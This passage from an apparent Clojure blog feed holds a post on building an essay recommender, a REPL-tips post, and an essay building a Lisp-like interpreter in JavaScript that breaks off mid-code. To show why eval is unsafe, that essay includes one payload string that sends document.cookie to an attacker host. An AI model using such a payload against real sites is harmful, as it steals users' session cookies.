Building an essay recommender system in 10 days

I recently finished the MVP for an idea I had last month: Findka Essays, a newsletter that adapts to your preferences with machine learning. I pivoted to this from a much more complicated recommender system app, so I was already familiar with (almost) all the parts needed to build it. I'm extremely happy with the result: the new app is simple, the codebase is clean, and I launched it in under two weeks. In the grand tradition of our people, it is now time for an architecture + toolkit walkthrough. Feel free to skip to whichever sections interest you most. If you read only one section, I suggest Recommendations.

Note: I've abstracted a lot of the code into Biff, a web framework I released several months ago. I'll reference Biff frequently.


Language

The vast majority of the app is written in Clojure (the only exception is the actual recommendation algorithm, which is written in Python). Clojure is a fabulous language that has a strong emphasis on simplicity and stability, which makes codebases easy to maintain and extend in the long run. As a Lisp, it also has an extremely tight feedback loop which is great for rapid development.

There is a trade-off: since Clojure focuses on long-term concerns over short-term concerns, it can take a while to get up to speed (though it's a lot easier if you have a mentor). For example, to do web dev in Clojure, you'll need to learn how to piece together a bunch of individual libraries—there isn't a go-to framework like Rails or Django. (Luminus is probably the best starting point, after you're familiar with the language itself).

In most cases, I'd say the trade-off is well worth it. But for small or experimental apps (like you might build in a startup), speed at the beginning is extra valuable. If you want to move fast right away but you're not already comfortable in the Clojure ecosystem, you might have a bad time. One of my goals for Biff is to help mitigate that.

Front end

OK, now for some actual code. Findka Essays, unlike its predecessor, is a humble multi-page application. No React here. So the front end is pretty simple.

(For brevity, I'll call it "Findka" from here on out).

I use Rum for HTML generation. Here's a quick example:

(ns hello.world
 (:require
   [rum.core :as rum]))

(defn -main []
  (spit "hello.html"
    (rum/render-static-markup
      [:html
       [:body
        [:p {:style {:color "red"}}
         "Hello world!"]]])))

After installing Clojure, you could put that in src/hello/world.clj and then run the program with clj -Sdeps '{:deps {rum/rum {:mvn/version "0.11.5"}}}' -M -m hello.world. That's a great way to get started with Clojure, actually—you can make a whole static site with just functions, data structures, and Rum. That's how I made Findka's landing page. Here's a snippet:

(defn home []
  (base-page {:scripts [[:script {:src "/js/ensure-logged-out.js"}]]}
    [:.bg-dark.text-white
     [:.container.px-3.mx-auto.max-w-screen-md
      [:.nunito-sans-bold.text-2xl.mt-4.mb-8.sm:text-center
       "Great essays delivered to your inbox. " [:br.hidden.md:inline]
       "Chosen specifically for you with machine learning."]
      [:a.btn.btn-green.btn-block.sm:max-w-sm.mx-auto
       {:href "/signup"}
       "Sign up"]
      ...

This project is the first time I've used Tailwind CSS (I used Bootstrap previously). I give it two thumbs up. Tailwind gives you smaller, better building blocks than Bootstrap, and it has responsive variants for every class (hallelujah). Setup was straightforward. After an npm init; npm install tailwindcss --save-dev, you just need a few files:

tailwind.config.js:

module.exports = {
  purge: [
    './src/**/*.clj', // for tree-shaking
  ],
  theme: {
    extend: {
      colors: {
        'dark': '#343a40',
        'hn-orange': '#ff6600',
        ...
      }
    }
  }
}

tailwind.css:

@tailwind base;

@tailwind components;
@responsive {
  .btn-thin {
    @apply text-center py-2 px-4 rounded;
  }
  .btn {
    @apply btn-thin font-bold;
  }
  ...
}

@tailwind utilities;
@responsive {
  .nunito-sans-bold {
    font-family: 'Nunito Sans', sans-serif;
    font-weight : 900;
  }
  ...
}

Build with npx tailwindcss build tailwind.css -o output.css.

The last piece is fonts. I am not a designer, at all. Despite this, I have recently made a startling discovery: using different fonts, instead of just the default, can actually make your site look a lot better. It turns out you can just doom scroll through Google Fonts until you find some you like. I did that for Findka's logo (I tried AI logo generators in the past, but they weren't good).

Authentication

Findka supports signin via email link or Google. Biff mostly handles email link auth for you. Just make a form with an email field that POSTs to /api/signup. Biff sends the user an email with a link, they click on it, boom. You have to provide an email template and a function that actually sends the email. I use Mailgun, so Findka's email function looks like this:

(def templates
  {:biff.auth/signup
   (fn [{:keys [biff.auth/link]}]
     {:from "Findka Essays <...>"
      :subject "Create your Findka Essays account"
      :html (rum/render-static-markup
              [:div
               [:p "We received a request to create a Findka Essays account using this email address."]
               [:p [:a {:href link :target "_blank"} "Click here to create your account."]]
               [:p "If you did not request this link, you can ignore this email."]])})
   ...})

(defn send** [api-key opts]
  (http/post (str "https://api.mailgun.net/v3/mail.findka.com/messages")
    {:basic-auth ["api" api-key]
     :form-params opts}))

(defn send* [{:keys [mailgun/api-key template data] :as opts}]
  (if (some? template)
    (let [template-fn (get templates template)
          mailgun-opts (template-fn data)]
      (send** api-key mailgun-opts))
    (send** api-key (select-keys opts [:to :subject :text :html]))))

(defn send [{:keys [params template recaptcha/secret-key] :as sys}]
  (if (= template :biff.auth/signup)
    (let [{:keys [success score]}
          (:body
            (http/post "https://www.google.com/recaptcha/api/siteverify"
              {:form-params {:secret secret-key
                             :response (:g-recaptcha-response params)}
               :as :json}))]
      (when (and success (<= 0.5 score))
        (send* sys)))
    (send* sys)))

As shown at the end, I use Recaptcha for bot control. It's nice because you don't have to make the user do anything; Google's script will simply give you a score that represents how likely the user is to be a human.

Biff doesn't have Google sign-in support built in (yet), but it's pretty simple to add. After the front-end bit is taken care of, you just have to add an HTTP endpoint that receives a token, verifies it using Google's library, and sets a session cookie.

That's sort of a funny way to use Google sign-in, I'll admit. You're "supposed" to send the token with every request and verify it each time, letting Google's code handle sessions on the client. However, Biff is already set up for authenticating requests via session cookie, and that's more convenient for multi-page applications anyway.

CRUD

I use Crux for the database. Crux is an immutable document database with datalog queries. Another way to explain it is that Crux works well as a general-purpose database (e.g. a replacement for postgres), but it fits better with functional programming. You also get flexible data modeling without giving up query power.

(That ignores Crux's raison d'être, bitemporal queries—a cool feature, and no doubt extremely useful if you need those. For my simple applications, I haven't.)

Crux doesn't enforce any schema, but Biff does. You can specify schema using Clojure spec:

(require '[trident.util :as u])

(u/sdefs
  ::event-type #{:submit :email :click :like :dislike}
  ::timestamp  inst?
  ::url        string?
  ::parent     uuid?
  ::user       uuid?
  ::event      (u/only-keys
                 :req-un [::event-type
                          ::timestamp
                          ::user
                          ::url]
                 :opt-un [::parent]))

(def schema
  {:events {:spec [uuid? ::event]}})

This schema defines a "table" for events. The [uuid? ::event] part means that the primary key for an event document should be a UUID, and the rest of the document should conform to the spec given for ::event above. In this case, that means the document must have an event type, timestamp, user ID and URL, and it can optionally have a "parent" key (which is set to the primary key of another event).

Like a standard multi-page app, Findka has POST endpoints for writing to the database and GET endpoints for reading (though I have no idea if the endpoints adhere to REST or not). Here's one for submitting an essay:

(defn submit-essay [{:keys [biff/node session/uid params] :as sys}]
  (if (nil? uid)
    {:status 302
     :headers/Location "/login/"}
    (do
      (crux/await-tx node
        (biff.crux/submit-tx sys
          {[:events] {:user uid
                      :timestamp :db/current-time
                      :event-type :submit
                      :url (:url params)}}))
      {:status 302
       :headers/Location "/settings"})))

(def routes
  [["/api/submit-essay"
   {:post submit-essay
    :name ::submit-essay
    :middleware [anti-forgery/wrap-anti-forgery]}]
   ...])

And here's a snippet from the /settings page. The call to crux/q performs a datalog query which returns the current user's 10 most recent events, which are displayed in the UI:

(defn settings* [{:keys [biff/db session/uid]}]
  (let [events (map first
                 (crux/q db
                   {:find '[event timestamp]
                    :full-results? true
                    :args [{'user uid}]
                    :order-by '[[timestamp :desc]]
                    :limit 10
                    :where '[[event :event-type]
                             [event :user user]
                             [event :timestamp timestamp]]}))]
    ...
    [:div
     [:.h-5]
     [:.nunito-sans-bold.text-lg "Recent activity"]
     (for [[i {:keys [event-type url timestamp]}] (map-indexed vector events)]
       [:.p-2.leading-snug {:class (when (odd? i) "bg-gray-200")}
        [:.text-xs.text-gray-700 timestamp]
        [:div (case event-type
                :submit  "Submitted: "
                :email   "Received: "
                :click   "Clicked: "
                :like    "Added to favorites: "
                :dislike "Show less like this: ")
         [:a.text-blue-600 {:href url :target "_blank"} url]]])]
    ...))

(defn settings [sys]
  {:body (rum/render-static-markup
           (static/base-page
             {:scripts [[:script {:src "https://apis.google.com/js/platform.js"}]
                        [:script {:src "/js/ensure-logged-in.js"}]
                        [:script {:src "/js/settings.js"}]]}
             (settings* sys)))
   :headers/content-type "text/html"})

(def routes
  [["/settings" {:get settings
                 :name ::settings
                 :middleware [anti-forgery/wrap-anti-forgery]}]
   ...])

Recommendations

And here we are; the whole reason that Findka exists. Findka sends you daily or weekly emails. Each one includes a list of links to essays (submitted by other users). Whenever you click a link, Findka saves it as an event. Over time, Findka learns what kinds of essays you like. Everyone's click data is combined into a model, which Findka uses to pick essays for you.

Most of the work is done by Surprise, a Python library that includes several different collaborative filtering algorithms. (That library is why I'm using Python at all instead of just Clojure—no need to reinvent the wheel). Findka uses the k-NN baseline algorithm. It looks for essays that are often liked by people who like the same essays as you. If there's not much data yet (as is the case right now, since Findka launched recently), it defaults to recommending essays that are the most liked in general.

I've added two additional layers. I call the first one "popularity smoothing." I sort all the essays by the number of times they've been recommended in the past, and I partition them into 10 bins. Whenever I pick an essay to send someone, I first choose a bin with uniform probability, and then I use k-NN to select an essay from that bin. Thus, the top 10% most popular essays will take up only 10% of the recommendations (if left unchecked, popular items can end up taking much more than their fair share of recommendations).

The other layer is for exploration vs. exploitation, which is the need to balance recommending relevant essays with recommending more diverse essays, in order to better learn the user's preferences. I use an "epsilon-greedy" strategy: for a fixed percentage of the time, I recommend a random essay instead of using k-NN. At the moment, that percentage is quite high: 50%. As Findka grows and accumulates more data, I'll likely turn the percentage down.

Notably, I am not currently using content-based filtering. Often, article recommenders analyze the articles' text and use that to figure out which ones are similar. This makes a lot of sense for news, where you're always recommending new articles that may not have much user interaction data yet. However, Findka is intended for articles that stay relevant over time. We can afford to let articles build up clicks gradually before we recommend them to lots of users. Content-based filtering would likely still be helpful, so I'll experiment with it at some point.

To run the Python code, I simply call it as a subprocess from Clojure. First, I generate a CSV with all the user events. The Python code ingests the CSV and then spits out a different CSV that has a list of URLs for each user. From Clojure, I then send out emails with those URLs.

(require '[trident.util :as u])

(defn get-user->recs [db]
  (write-event-csv db)
  (u/sh "python3" (.getPath (io/resource "python/recommend.py")))
  (read-recommendation-csv))

I read the Python file from the JVM classpath, which makes deployment easy. I just include the file in my app's resources. For better scaling, I'll eventually move the Python code to a dedicated server.

Devops

This is my favorite section. Linux system administration always warms my heart, since messing around with Linux as a teenager played a huge part in my early computing education. I still remember the feeling of wonder that came after I learned shutdown -h now (at least, after I figured out that typing your password in the terminal doesn't make little asterisks show up). There was something about being able to interect with the system so directly that caught my attention.

Anyway. Findka runs on a DigitalOcean droplet. I use Packer and Terraform for provisioning, and I deploy code from Findka's git repository using tools.deps' git dependency feature.

For all my projects, I like to add a task bash script with the following form:

#!/bin/bash
set -e

foo () {
  ...
}

bar () {
  ...
}

"$@"

This way, you add build tasks by simply defining a new function. I put alias t='./task' in my .bashrc, so I can run a task with e.g. t foo.

Here is Findka's task file. I'll go through each of the tasks:

#!/bin/bash
set -e

init () {
  terraform init
}

build-image () {
  packer build -var "do_key=$DIGITALOCEAN_KEY" webserver.json
  curl -X GET -H "Authorization: Bearer $DIGITALOCEAN_KEY" \
       "https://api.digitalocean.com/v2/images?private=true" | jq
}

tf () {
  terraform $1 \
    -var "do_token=${DIGITALOCEAN_KEY}" \
    -var "github_deploy_key=$GITHUB_DEPLOY_KEY"
}

dev () {
  BIFF_ENV=dev clj -m biff.core
}

css () {
  npx tailwindcss build tailwind.css -o resources/www/findka-essays/css/custom.css
}

css-prod () {
  NODE_ENV=production css
}

deploy () {
  git push origin master
  scp config.edn biff@essays.findka.com:config.edn
  scp blank-prod-deps.edn biff@essays.findka.com:deps.edn
  ssh biff@essays.findka.com systemctl restart biff
  ssh biff@essays.findka.com journalctl -u biff -f
}

prod-connect () {
  ssh -NL 7800:localhost:7888 biff@essays.findka.com
}

"$@"

init: not much to say. You have to run this once.

build-image: this sets up an Ubuntu image for the DigitalOcean droplet. Here's the config file, webserver.json:

{
  "builders": [
    {
      "monitoring": true,
      "type": "digitalocean",
      "size": "s-1vcpu-1gb",
      "region": "nyc1",
      "ssh_username": "root",
      "image": "ubuntu-20-04-x64",
      "api_token": "{{user `do_key`}}",
      "private_networking": true,
      "snapshot_name": "findka-essays-webserver"
    }
  ],
  "provisioners": [
    {
      "type": "shell",
      "script": "./provision.sh"
    }
  ],
  "variables": {
    "do_key": ""
  },
  "sensitive-variables": [
    "do_key"
  ]
}

provision.sh is a ~100 line script that:

  1. Installs packages (Clojure, Nginx, Python Surprise, Certbot)
  2. Sets up a non-root user
  3. Creates a Systemd service which starts the app on boot
  4. Configures Nginx, Letsencrypt, and a firewall

After Packer finishes, the build-image task prints out the ID for the newly created image, which Terraform needs.

tf: this task deploys infrastructure according to a webserver.tf file. Here's a snippet:

...

resource "digitalocean_droplet" "webserver" {
    image = "<image ID from the build-image task>"
    name = "findka-essays-webserver"
    region = "nyc1"
    size = "s-1vcpu-1gb"
    private_networking = true
    ssh_keys = [
      data.digitalocean_ssh_key.Jacob.id
    ]
    connection {
      host = self.ipv4_address
      user = "root"
      type = "ssh"
      timeout = "2m"
    }
    provisioner "file" {
      source = "config.edn"
      destination = "/home/biff/config.edn"
    }
    provisioner "file" {
      content = var.github_deploy_key
      destination = "/home/biff/.ssh/id_rsa"
    }
}

...

Not shown is some configuration for DNS records and a managed Postgres database, which Crux uses for persistence.

dev, css: these are used for local development. After some code is finished, I run css-prod and then commit. If I was using CI/CD, I'd have that build the CSS artifact instead of commiting it to git.

deploy: the funnest task. It pushes to git, copies over a gitignored config file (which includes secrets, like API keys), deploys the new code, and then watches the logs.

Clojure has a feature where you can depend on a git repository. When you start your app, Clojure will clone the repo and add its code to the classpath. You need to specify a commit hash, but if you omit the hash, you can run a command to fetch the hash for the latest commit. So the scp blank-prod-deps.edn ... does just that:

{:deps
 {github-jacobobryant/findka-essays
  {:git/url "git@github.com:jacobobryant/findka.git",
   :tag "HEAD",
   :deps/root "essays"}}}

After running ssh biff@essays.findka.com systemctl restart biff, the Systemd service will fetch the latest commit hash (which was just pushed to master), add it to the dependency file, and start the application. (This works with private repos, by the way: that's why Terraform copies my Github deploy key to the server). This causes roughly a minute of downtime, but that's fine for Findka's scale.

The last task, prod-connect, lets you run arbitrary Clojure code over the wire. It's kind of like SSHing in to your server and running psql so you can query your production database, but it's more powerful: you can run Clojure code in the running production app's JVM process. Thanks to Clojure's late binding, you can even redefine functions—like an HTTP handler—and have the new definitions take effect immediately. All from the comfort of your favorite text editor (Vim, right?).

When I first launched Findka, I used this feature to send out emails manually for a couple days, before adding it to a cron job. I have a Clojure namespace that looks like this:

(ns findka.essays.admin
  (:require
    [trident.util :as u]
    ...))

(defn get-email-data [db]
  ...)

(comment
  (u/pprint
    (let [{:keys [biff/node] :as sys} @biff.core/system
          db (crux/db node]
      (get-email-data db)))

If I put my cursor on u/pprint and then type cpp while prod-connect is running, it will execute that code on the server. So I can print out the data that will be passed to my email-sending function without actually sending the emails. If something looks wrong in the data, I can modify the get-email-data function and re-run it without having to run the deploy task. When everything's good, I run a different function that sends the emails.

In general, this is great for:

  • debugging production issues
  • low-effort, high-power "admin dashboard"
  • back-end feature dev in prod (I don't recommend doing this if you're part of a team, but that's one of the advantages of being a solo developer: there's no one to hear you scream stop you)

Analytics

The last piece of the puzzle. Since Findka already saves events whenever someone submits an article or clicks a link in an email, I use those to calculate daily active users and other stats. I have a daily cron job (not an actual cron job, just a recurring task scheduled by chime) that queries for all the events, prints out a plain text table with stats, and emails it to me.

(defn print-usage-report [{:keys [db now]}]
  (let [events (map first
                 (crux/q db
                   {:find '[doc]
                    :full-results? true
                    :where '[[doc :event-type event-type]
                             [(== event-type #{:like :dislike :click :submit})]
                             [doc :user]]}))
        ...]
    (u/print-table
      [[:t "Day     "]
       [:signups "Conversions"]
       [:returning "Returning users"]]
      (for [t ts
            :let [users (get day->users t)
                  signups (get day->signups t)
                  returning (count (filter #(not= t (user->first-day %)) users))]]
        {:t (u/format-date t "dd MMM")
         :signups signups
         :returning returning}))
    ...))

That doesn't cover page hits, so I also use Simple Analytics. However it wouldn't be hard to add some custom JS to each page that sends the current URL and the referrer to an endpoint, which saves it as another event. I'll probably do that at some point. Then I could add page hits to my daily analytics emails, including landing page conversion rate.


Well, diligent reader, I congratulate you for sticking with me until the end. Give Findka a try and let me know what you think. Also let me know if you'd like to use this development stack for your own projects. I'm planning on doing a lot more work on Biff soon. Biff already includes parts of this stack, but not all.

Permalink

Dragan Djuric - Cognicast Episode 154

In this episode, we talk to Dragan Djuric about deep learning, AI and writing technical books.

Our Guest, Dragan Djuric

Topics

SUBSCRIBING TO THE COGNICAST

The show is available on iTunes! You can also subscribe to the podcast using our podcast feed.

You can send feedback about the show to podcast@cognitect.com, or leave a comment here on the blog. Thanks for listening!

CREDITS

Permalink

Clojure Power Tools Part 1

IntelliJ IDEA and Cursive

Introduction

I have been working at Metosin for some months now and I’m learning new Clojure tricks almost every day. I list here some of my favorite Clojure tricks that I have learned either from various Clojure presentations or at Metosin. I know that for a newcomer Clojure might be a bit weird language and newcomers usually don’t know simple productivity tricks. Hopefully, this presentation makes it a bit easier for newcomers to start being productive with Clojure.

Start Doing It

If you are a complete newcomer in the Clojure land I have one recommendation: Just start doing it. Choose an editor, install the required tools, and start learning. The most important thing is that you start learning with a Clojure REPL. And with an editor that has good integration with the Clojure REPL. There are several options:

I believe those are the most used editors with good REPL integrations, at least according to the latest State of Clojure.

If you are a complete newcomer a good idea is to choose an editor that you already know. Install the Repl plugin to that editor and learn to use it. Especially learn how to send the forms (Clojure expressions) from the editor to the REPL for evaluation.

Once you have a working development environment start learning Clojure. A good resource is Brave Clojure. And remember to do the exercises and experiments with your editor and send the forms to REPL for evaluation using your hotkey!

Use a REPL Scratch File

I believe that newcomers often write their experiments in the REPL editor, at least I did. Don’t do it. Instead, create a scratch file and write your experiments there. I watched some Stuart Halloway presentation in which he told that he has a dedicated Clojure directory in which he has written all his Clojure experimentations for several years - must be pretty nice to be able to grep when looking for something you have written years ago. I have another habit. I have in my ~/.clojure/deps.edn file:

{
 :aliases {
           :kari {:extra-paths ["scratch"]
                  :extra-deps {hashp/hashp {:mvn/version "0.1.1"}
                               com.gfredericks/debug-repl {:mvn/version "0.0.11"}
                               djblue/portal {:mvn/version "0.6.1"}
                               }
                  }
           }
 }

Focus on row :kari {:extra-paths ["scratch"]. This line adds directory scratch into the Clojure path in any project in which I add my personal profile kari, e.g.:

clj -M:dev:test:common:backend:kari -m nrepl.cmdline -i -C

I.e. All projects have various aliases that you need to use when starting the REPL. I just add my personal alias kari at the end and then I’m able to create scratch.clj file in that scratch directory and write all project specific Clojure experimentation there. I think this is also a nice way - I have all my project related Clojure experimentation in one place. A screenshot from my IntelliJ IDEA showing the scratch directory and two scratch files: one for backend experimentation (scratch.clj - content showing in the editor window) and one for frontend experimentation (scratch-cljs.cljs).

Scratch directory in IntelliJ IDEA

Rich Comments

Clojurians use so-called rich comments. These are typically small code snippets at the end of the file surrounded in comment form. This way the Clojure code inside the rich comment is valid Clojure code that is read by the Clojure reader but it is not evaluated. Therefore you can put all kinds of namespace specific experimentation or code examples in the rich comment block. Example from one of my exercises: domain_postgres.clj:

(comment
  (simpleserver.test-config/go)
  (simpleserver.test-config/halt)
  (simpleserver.test-config/test-env)
  (let [db (get-in (simpleserver.test-config/test-env) [:service :domain :db])]
    (sql-get-products db {:pg-id (str 2)}))
  (let [db (get-in (simpleserver.test-config/test-env) [:service :domain :db])]
    (sql-get-product db {:pg-id (str 2) :p-id (str 4)}))
  )

It’s pretty easy later on to remember stuff in those rich comments. E.g. in the above-mentioned example I have some functions to start/halt the Integrant test state and some functions in which I test some SQL operations in the domain using the database connection from the test state.

Use Defs Inside Functions When Debugging

This is a classic Clojure trick. If you are wondering what is happening inside some function - just take a snapshot of the most important entities in that function. Let’s look at the same file, domain_postgres.clj:

(if-let [kv (sql-get-product db {:pg-id (str pg-id) :p-id (str p-id)})]

I wonder what kind of data structure is returned from the function and bound to kv? Let’s see:

    (if-let [kv (sql-get-product db {:pg-id (str pg-id) :p-id (str p-id)})]
      (let [_ (def todo-kv kv)]
        [(:id kv)

The magic is in the let I added: (let [_ (def todo-kv kv)]: we just create a var (todo-kv) and bind the value of kv to it.

Then let’s run the tests so that this function gets called and after the test let’s examine todo-kv:

todo-kv
=>
{:id "4",
 :pg_id "2",
 :title "Test Once Upon a Time in the West",
 :price 14.40M,
 :a_or_d "Leone",
 :year 1968,
 :country "Italy-USA",
 :g_or_l "Western"}

Use Hashp for Printing Values

Sometimes you want to preserve the data structure and examine it in your scratch file - then the def trick described in the previous chapter is all you need. But sometimes you just want to see the value. You could use e.g. clojure.pprint to print the value of the var but there is another nice power tool for it: hashp. E.g. in your rich comment evaluate: (require '[hashp.core]) and then add #p before the function you are interested in, e.g.:

(if-let [kv #p (sql-get-product db {:pg-id (str pg-id) :p-id (str p-id)})]

Evaluate the namespace (or reset Integrant state or something similar) and run the tests and you will see an output like:

Testing simpleserver.service.domain.domain-test
#p[simpleserver.service.domain.domain-postgres.PostgresR/fn:37] (sql-get-product db {:p-id (str p-id), :pg-id (str pg-id)}) => 
{:a_or_d "Leone",
 :country "Italy-USA",
 :g_or_l "Western",
 :id "4",
 :pg_id "2",
 :price 14.40M,
 :title "Test Once Upon a Time in the West",
 :year  1968}

Use Panel to Visualize Data

This is pretty cool and I learned this only this week from one Metosin Clojure guru (aah, I need to remember to write a chapter: “Find a Clojure Shop”).

If you have a complex domain in which you have a lot of data with a lot of children and those children having children and so on - it is a bit daunting to try to visualize this in the REPL output window or using the REPL to navigate in the data. portal to the rescue!

Write the following forms in your scratch file or in the rich comment of your namespace - I’ll use the same domain_postgres.clj file as an example.

  (require '[portal.api :as portal-api])
  (portal.api/open)
  (portal.api/tap)
  (tap> (let [db (get-in (simpleserver.test-config/test-env) [:service :domain :db])]
    (sql-get-products db {:pg-id (str 2)})))

So, the (portal.api/open) opens the visualization window, (portal.api/tap) adds portal as a tap, and then using tap> you can send data to the visualization window. See example:

IntelliJ IDEA and Cursive

This is a very simple example. But imagine that there are hundreds of lines of data, vectors, maps, more vectors and maps inside them, etc. A visualization tool like Portal is a must-have tool. There are other similar visualization tools - the Clojure itself has one nowadays: clojure.inspector

Find a Clojure Shop

If you really want to learn Clojure I strongly recommend you to find a job in which you are able to spend 8 hours every work day with Clojure - with other seasoned Clojurians. I really can’t overemphasize how important this is. I learned the basic stuff of Clojure alone, just reading books, googling stuff, doing exercises. I had a long career in the corporate world and one day I realized that I have paid my mortgage and my kids are adults and I can basically do whatever I like with my life - and I asked myself: What do you want really want to do? I realized that I want to do Clojure & cloud projects. I contacted the most prominent Clojure shops in Finland and got a job at the best of them, Metosin. Damn, it’s been a jolly ride with Metosin. The company is full of world-class Clojurians, just look at some extremely popular Metosin libraries like reitit. And I got a chance to work in the same project with guys who build these libraries. I should be paying them instead company paying me. What an incredible luck. In a few months I have already learned so much from these guys. And learning more and more every day.

So. If you really want to learn Clojure, it is really, really important to find a great Clojure shop where you can learn from the best.

Conclusions

There are a lot of other Clojure tricks and tools - maybe I’ll write “Clojure Power Tools Part 2” blog post in the future.

The writer is working at Metosin using Clojure in cloud projects. If you are interested to start a Clojure project in Finland or you are interested to get Clojure training in Finland you can contact me by sending email to my Metosin email address or contact me via LinkedIn.

Kari Marttila

Permalink

An Intuition for Lisp Syntax

Every lisp hacker I ever met, myself included, thought that all those brackets in Lisp were off-putting and weird. At first, of course. Soon after we all came to the same epiphany: lisp’s power lies in those brackets! In this essay, we’ll go on a journey to that epiphany.

Draw

Say we were creating a program that let you draw stuff. If we wrote this in JavaScript, we might have functions like this:

drawPoint({x: 0, y: 1}, &aposyellow&apos)
drawLine({x: 0, y: 0}, {x: 1, y: 1}, &aposblue&apos)
drawCircle(point, radius, &aposred&apos)
rotate(shape, 90)
...

So far, so cool.

Challenge

Now, here’s a challenge: Can we support remote drawing?

This means that a user would be able to “send” instructions to your screen, and you would see their drawing come to life.

How could we do it?

Well, say we set up a websocket connection. We could receive instructions from the user like this:

websocket.onMessage(data => { 
  /* TODO */ 
})

Eval

To make it work off the bat, one option could be to take code strings as input:

websocket.onMessage(data => {
  eval(data)
})

Now the user could send "drawLine({x: 0, y: 0}, {x: 1, y: 1}, &aposred&apos)" and bam: we’ll draw a line!

But…your spidey sense may already be tingling. What if the user was malicious and managed to send us an instruction like this:

"window.location=&aposhttp://iwillp3wn.com?user_info=&apos + document.cookie"

Uh oh…our cookie would get sent to iwillp3wn.com, and the malicious user would indeed pwn us. We can’t use eval; it’s too dangerous.

There lies our problem: we can’t use eval, but we need some way to receive arbitrary instructions.

An initial idea

Well, we could represent those instructions as JSON. We can map each JSON instruction to a special function, and that way we can control what runs. Here’s one way we can represent it:

{
  instructions: [
    { functionName: "drawLine", args: [{ x: 0, y: 0 }, { x: 1, y: 1 }, "blue"] },
  ];
}

This JSON would translate to drawLine({x: 0, y: 0}, {x: 1, y: 1},"blue")

We could support this pretty simply. Here’s how our onMessage could look:

webSocket.onMessage(instruction => { 
  const fns = {
    drawLine: drawLine,
    ...
  };
  data.instructions.forEach((ins) => fns[ins.functionName](...ins.args));
})

That seems like it would work!

An initial simplification

Let’s see if we can clean this up. Here’s our JSON:

{
  instructions: [
    { functionName: "drawLine", args: [{ x: 0, y: 0 }, { x: 1, y: 1 }, "blue"] },
  ];
}

Well, since every instruction has a functionName, and an args, we don’t really need to spell that out. We could write it like this:

{
  instructions: [["drawLine", { x: 0, y: 0 }, { x: 1, y: 1 }, "blue"]],
}

Nice! We changed our object in favor of an array. To handle that, all we need is a rule: the first part of our instruction is the function name, and the rest are arguments. If we wrote that down, here’s how our onMessage would look:

websocket.onMessage(data => { 
  const fns = {
    drawLine: drawLine,
    ...
  };
  data.instructions.forEach(([fName, ...args]) => fns[fName](...args));
})

And bam, drawLine would work again!

More power

So far, we only used drawLine:

drawLine({x: 0, y: 0}, {x: 1, y: 1}, &aposblue&apos)
// same as
["drawLine", { x: 0, y: 0 }, { x: 1, y: 1 }]

But what if we wanted to express something more powerful:

rotate(drawLine({x: 0, y: 0}, {x: 1, y: 1}, &aposblue&apos), 90)

Looking at that, we can translate it to an instruction like this:

["rotate", ["drawLine", { x: 0, y: 0 }, { x: 1, y: 1 }], 90]

Here, the rotate instruction has an argument that is in itself an instruction! Pretty powerful. Surprisingly, we just need to tweak our code a tiny bit to make it work:

websocket.onMessage(data => { 
  const fns = {
    drawLine: drawLine,
    ...
  };
  const parseInstruction = (ins) => {
    if (!Array.isArray(ins)) {
      // this must be a primitive argument, like {x: 0 y: 0}
      return ins;
    }
    const [fName, ...args] = ins;
    return fns[fName](...args.map(parseInstruction));
  };
  data.instructions.forEach(parseInstruction);
})

Nice, We introduce a parseInstruction function. We can apply parseInstruction recursively to arguments, and support stuff like:

["rotate", ["rotate", ["drawLine", { x: 0, y: 0 }, { x: 1, y: 1 }], 90]]]

Very cool!

Further simplification

Okay, let’s look at our JSON again:

{
  instructions: [["drawLine", { x: 0, y: 0 }, { x: 1, y: 1 }]],
}

Well, our data only contains instructions. Do we really need a key called instructions?

What if we did this:

["do", ["drawLine", { x: 0, y: 0 }, { x: 1, y: 1 }]]

Instead of a top-level key, we could have a special instruction called do, which runs all the instructions it’s given.

Here’s one way we can implement it:

websocket.onMessage(data => { 
  const fns = {
    ...
    do: (...args) => args[args.length - 1],
  };
  const parseInstruction = (ins) => {
    if (!Array.isArray(ins)) {
      // this must be a primitive argument, like {x: 0, y: 0}
      return ins;
    }
    const [fName, ...args] = ins;
    return fns[fName](...args.map(parseInstruction));
  };
  parseInstruction(instruction);
})

Oh wow, that was easy. We just added do in fns. Now we can support an instruction like this:

[
  "do",
  ["drawPoint", { x: 0, y: 0 }],
  ["rotate", ["drawLine", { x: 0, y: 0 }, { x: 1, y: 1 }], 90]],
];

Even more power

Let’s make it more interesting. What if we wanted to support definitions?

const shape = drawLine({x: 0, y: 0}, {x: 1, y: 1}, &aposred&apos)
rotate(shape, 90)

If we could support definitions, our remote user could write some very expressive instructions! Let’s convert our code to the kind of data structure we’ve been playing with:

["def", "shape", ["drawLine", { x: 0, y: 0 }, { x: 1, y: 1 }]]
["rotate", "shape", 90]

Noot bad! If we can support an instruction like that, we’d be golden! Here’s how:

websocket.onMessage(data => { 
  const variables = {};
  const fns = {
    ...
    def: (name, v) => {
      variables[name] = v;
    },
  };
  const parseInstruction = (ins) => {
    if (variables[ins]) {
      // this must be some kind of variable, like "shape"
      return variables[ins];
    }
    if (!Array.isArray(ins)) {
      // this must be a primitive argument, like {x: 0 y: 0}
      return ins;
    }
    const [fName, ...args] = ins;
    return fns[fName](...args.map(parseInstruction));
  };
  parseInstruction(instruction);
})

Here, we introduced a variables object, which keeps track of every variable we define. A special def function updates that variables object. Now we can run this instruction:

[
  "do",
  ["def", "shape", ["drawLine", { x: 0, y: 0 }, { x: 1, y: 1 }]],
  ["rotate", "shape", 90],
];

Not bad!

Extreme Power: Goal

Let’s step it up a notch. What if we let our remote user define their own functions?

Say they wanted to write something like this:

const drawTriangle = function(left, top, right, color) { 
   drawLine(left, top, color);
   drawLine(top, right, color); 
   drawLine(left, right, color); 
} 
drawTriangle(...)

How would we do it? Let’s follow our intuition again. If we transcribe this to our data representation, here’s how it could look:

  ["def", "drawTriangle",
  ["fn", ["left", "top", "right", "color"],
    ["do",
      ["drawLine", "left", "top", "color"],
      ["drawLine", "top", "right", "color"],
      ["drawLine", "left", "right", "color"],
    ],
  ],
],
["drawTriangle", { x: 0, y: 0 }, { x: 3, y: 3 }, { x: 6, y: 0 }, "blue"],

Here,

const drawTriangle = ...

translates to

["def", "drawTriangle", …]. 

And

function(left, top, right, color) {…}

translates to

["fn", ["left", "top", "right", "color"], ["do" ...]]

All we need to do is to parse this instruction somehow, and bam, we are good to go!

Extreme Power: Key

The key to making this work is our ["fn", …] instruction. What if we did this:

const parseFnInstruction = (args, body, oldVariables) => {
  return (...values) => {
    const newVariables = {
      ...oldVariables,
      ...mapArgsWithValues(args, values),
    };
